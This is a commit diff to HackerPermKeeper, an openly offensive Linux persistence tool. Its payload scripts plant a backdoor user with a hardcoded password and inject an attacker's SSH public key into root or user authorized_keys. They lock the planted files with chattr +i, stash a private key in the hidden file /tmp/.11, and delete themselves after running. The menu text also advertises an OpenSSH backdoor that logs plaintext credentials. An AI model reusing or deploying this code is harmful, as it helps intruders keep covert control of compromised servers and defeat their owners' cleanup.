Add files via upload

config.py

@@ -10,7 +10,7 @@
 
 
 def configs():
-    print(colored('HackerPermKeeper v3.0 by 弱鸡 支持以下漏洞检测 https://github.com/RuoJi6/HackerPermKeeper', 'green'))
+    print(colored('HackerPermKeeper v4.0 by 弱鸡 支持以下漏洞检测 https://github.com/RuoJi6/HackerPermKeeper', 'green'))
     print(colored('1--------------OpenSSH后门', 'yellow'),colored('[利用]', 'red'))
     print('OpenSSH后门  优点：直接重置目标服务器的OpenSSH，在里面写入万能密码以及记录ssh明文账户代码 ''  缺点：需要依大量的依赖环境，而且只能使用低版本系统，目前经过测试的有乌班图14',colored('[建议指数：*]\n', 'red'))
 
@@ -52,7 +52,7 @@ def configs():
     print('检测对方服务器适合什么类型的权限维持模块', colored('[*****]', 'red'))
 
 def configss():
-    print(colored('HackerPermKeeper v3.0 by 弱鸡 支持以下漏洞检测 https://github.com/RuoJi6/HackerPermKeeper', 'green'))
+    print(colored('HackerPermKeeper v4.0 by 弱鸡 支持以下漏洞检测 https://github.com/RuoJi6/HackerPermKeeper', 'green'))
     print(colored('1--------------OpenSSH后门', 'yellow'),colored('[利用]', 'red'))
     print(colored('2--------------后门用户', 'yellow'),colored('[利用]', 'red'))
     print(colored('3--------------Alias后门', 'yellow'),colored('[利用]', 'red'))

main.py

@@ -44,7 +44,7 @@ def ml(command):
 #         print('No')
 
 try:
-    name = colored('HackerPermKeeper v2.0 by 弱鸡 https://github.com/RuoJi6/HackerPermKeeper', 'green')
+    name = colored('HackerPermKeeper v4.0 by 弱鸡 https://github.com/RuoJi6/HackerPermKeeper', 'green')
     arg = ArgumentParser(description=name)  # 创建解析器, description内容就是
     arg.add_argument("-m", "--multiple", help="选择权限维持模块 -m 1")
     arg.add_argument("-c", "--config", help="查看支持的权限维持模块 -c 1,查看详细使用说明 -c 2 ")

payload/2adduser/adduser.py

@@ -37,10 +37,17 @@ def adduser(user, password):
 
 
 def deluser(user):
-    command = "sed -i '/^" + user + ":/d' /etc/shadow"
-    ml(command)
-    command = "sed -i '/^" + user + ":/d' /etc/passwd"
-    ml(command)
+    try:
+        ml('chattr -i /etc/passwd')
+        ml('chattr -i /etc/shadow')
+        command = "sed -i '/^" + user + ":/d' /etc/shadow"
+        # "sed -i '/^passw123:/d' /etc/shadow"
+        ml(command)
+        command = "sed -i '/^" + user + ":/d' /etc/passwd"
+        ml(command)
+    except Exception as e:
+        pass
+
 
 def delete_current_script():
     try:
@@ -53,6 +60,6 @@ def delete_current_script():
 if __name__ == '__main__':
     user = 'passw123'
     password = 'admin@#45123'
+    deluser(user)  # 删除用户
     adduser(user, password)
-    # deluser(user)  #删除用户
     delete_current_script()  # 删除当前执行脚本文件

payload/2adduser/adduser_new_user.py

@@ -2,6 +2,7 @@
 from __future__ import print_function
 import subprocess
 import sys,os
+import requests
 
 def ml(command):
     process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
@@ -33,6 +34,17 @@ def adduser(user, password):
     else:
         print("----------------------->失败<-----------------------")
 
+def deluser(user):
+    try:
+        ml('chattr -i /etc/passwd')
+        ml('chattr -i /etc/shadow')
+        command = "sed -i '/^" + user + ":/d' /etc/shadow"
+        ml(command)
+        command = "sed -i '/^" + user + ":/d' /etc/passwd"
+        ml(command)
+    except Exception as e:
+        pass
+
 def delete_current_script():
     try:
         script_path = os.path.abspath(sys.argv[0])
@@ -41,16 +53,9 @@ def delete_current_script():
     except Exception as e:
         print("无法删除当前脚本文件：", e)
 
-def deluser(user):
-    command = "sed -i '/^" + user + ":/d' /etc/shadow"
-    ml(command)
-    command = "sed -i '/^" + user + ":/d' /etc/passwd"
-    ml(command)
-
-
 if __name__ == '__main__':
     user = 'passw123'
     password = 'admin@#45123'
+    deluser(user)  # 删除用户
     adduser(user, password)
-    # deluser(user)  #删除用户
     delete_current_script()  # 删除当前执行脚本文件

payload/6sshkey/sshkey_local.py

@@ -75,17 +75,31 @@ def delete_current_script():
     except Exception as e:
         print("无法删除当前脚本文件：", e)
 
+def delsshKey(user):
+    try:
+        if 'root' in user:
+            ml('chattr -i /root/.ssh')
+            ml('chattr -i /root/.ssh/authorized_keys')
+            ml('rm -rf /root/.ssh/authorized_keys')
+        else:
+            ml('chattr -i /home/'+user+'/.ssh')
+            ml('chattr -i /home/'+user+'/.ssh/authorized_keys')
+            ml('rm -rf  /home/' + user + '/.ssh/authorized_keys')
+    except Exception as e:
+        pass
+
 if __name__ == '__main__':
     id_ed25519_pub = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIF9OQyvU7TkC4Julezg31Lbj2YB3RSwhmM0yJwwtO4iK kali@kali"
     # 调用 miyue 函数来在文件末尾写入新内容
     # ssh-keygen -t ed25519 -N "admin!@#45123"
+    user = ml('whoami').strip()
+    delsshKey(user)
     try:
         miyue("HostKey /etc/ssh/ssh_host_ed25519_key")
         miyue("PubkeyAuthentication yes")
         miyue("AuthorizedKeysFile .ssh/authorized_keys")
     except Exception as e:
         print('低权限用户配置文件写入失败，有的低权限用户不影响使用')
-    user = ml('whoami').strip()
     if 'root' in user:
         root_authorized_keys(id_ed25519_pub)
         ml('chattr +i /root/.ssh && chattr +i /root/.ssh/authorized_keys')

payload/6sshkey/sshkey_target.py

@@ -2,7 +2,8 @@
 # !/usr/bin/env python
 from __future__ import print_function
 import subprocess
-import os,sys
+import os, sys
+
 
 def ml(command):
     process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
@@ -26,7 +27,7 @@ def miyue(new_content):
         file.write(new_content + '\n')
 
 
-def generate_ssh_key(password,user):
+def generate_ssh_key(password, user):
     if 'root' in user:
         command = 'ssh-keygen -t ed25519 -N "' + password + '" -q -f /' + user + '/.ssh/id_ed25519'
     else:
@@ -40,18 +41,20 @@ def generate_ssh_key(password,user):
         print("SSH密钥生成失败。错误信息：")
         print(error.decode())
 
-def file_key(user,keyt):
+
+def file_key(user, keyt):
     if 'root' in user:
         file_path = "/" + user + "/.ssh/authorized_keys"
     else:
         file_path = "/home/" + user + "/.ssh/authorized_keys"
     if os.path.exists(file_path):
         print("文件写入成功")
-        id_ed25519(user,keyt)
+        id_ed25519(user, keyt)
     else:
         print("文件写入失败")
 
-def id_ed25519(user,keyt):
+
+def id_ed25519(user, keyt):
     if 'root' in user:
         file_path = "/" + user + "/.ssh/id_ed25519.pub"
         file_path2 = "/" + user + "/.ssh/id_ed25519"
@@ -62,42 +65,55 @@ def id_ed25519(user,keyt):
         print("id_ed25519.pub&id_ed25519删除失败")
     else:
         print("id_ed25519.pub&id_ed25519删除成功")
-        print('----->利用成功,生成的用户为:',ml('whoami').strip(),'<-----')
-        print('----->连接命令: ssh -i 密钥文件 '+ str(ml('whoami').strip())+'@ip <-----')
-        print('请下载{'+keyt+'}密钥文件连接')
-
+        print('----->利用成功,生成的用户为:', ml('whoami').strip(), '<-----')
+        print('----->连接命令: ssh -i 密钥文件 ' + str(ml('whoami').strip()) + '@ip <-----')
+        print('请下载{' + keyt + '}密钥文件连接')
 
 
 def delete_current_script():
     try:
         script_path = os.path.abspath(sys.argv[0])
         os.remove(script_path)
-        print("当前脚本文件已成功删除"+script_path)
+        print("当前脚本文件已成功删除" + script_path)
     except Exception as e:
         print("无法删除当前脚本文件：", e)
 
+
+def delsshKey(user):
+    try:
+        if 'root' in user:
+            ml('chattr -i /root/.ssh')
+            ml('chattr -i /root/.ssh/authorized_keys')
+        else:
+            ml('chattr -i /home/' + user + '/.ssh')
+            ml('chattr -i /home/' + user + '/.ssh/authorized_keys')
+    except Exception as e:
+        pass
+
+
 if __name__ == '__main__':
     # 调用 miyue 函数来在文件末尾写入新内容
     # 调用 generate_ssh_key 函数生成SSH密钥对
+    user = ml('whoami').strip()
+    delsshKey(user)
     try:
         miyue("HostKey /etc/ssh/ssh_host_ed25519_key")
         miyue("PubkeyAuthentication yes")
         miyue("AuthorizedKeysFile .ssh/authorized_keys")
     except Exception as e:
         print('低权限用户配置文件写入失败，有的低权限用户不影响使用')
-    user = ml('whoami').strip()
     password = "admin!@#45123"
     keyt = '/tmp/.11'
-    generate_ssh_key(password,user)
+    generate_ssh_key(password, user)
     if 'root' in user:
         ml('cat /' + user + '/.ssh/id_ed25519.pub >> /' + user + '/.ssh/authorized_keys && chmod 600 /' + user + '/.ssh/authorized_keys && chmod 700 /' + user + '/.ssh/')
-        ml('cp /' + user + '/.ssh/id_ed25519 '+keyt)
-        ml('rm -rf /' + user + '/.ssh/id_ed25519 && rm -rf /'+ user + '/.ssh/id_ed25519.pub')
+        ml('cp /' + user + '/.ssh/id_ed25519 ' + keyt)
+        ml('rm -rf /' + user + '/.ssh/id_ed25519 && rm -rf /' + user + '/.ssh/id_ed25519.pub')
         ml('chattr +i /' + user + '/.ssh && chattr +i /' + user + '/.ssh/authorized_keys')
     else:
         ml('cat /home/' + user + '/.ssh/id_ed25519.pub >>  /home/' + user + '/.ssh/authorized_keys && chmod 600  /home/' + user + '/.ssh/authorized_keys && chmod 700  /home/' + user + '/.ssh/')
-        ml('cp  /home/' + user + '/.ssh/id_ed25519 '+keyt)
-        ml('rm -rf  /home/' + user + '/.ssh/id_ed25519 && rm -rf  /home/'+ user + '/.ssh/id_ed25519.pub')
+        ml('cp  /home/' + user + '/.ssh/id_ed25519 ' + keyt)
+        ml('rm -rf  /home/' + user + '/.ssh/id_ed25519 && rm -rf  /home/' + user + '/.ssh/id_ed25519.pub')
         ml('chattr +i  /home/' + user + '/.ssh && chattr +i /' + user + ' /home/.ssh/authorized_keys')
-    file_key(user,keyt)
+    file_key(user, keyt)
     delete_current_script()  # 删除当前执行脚本文件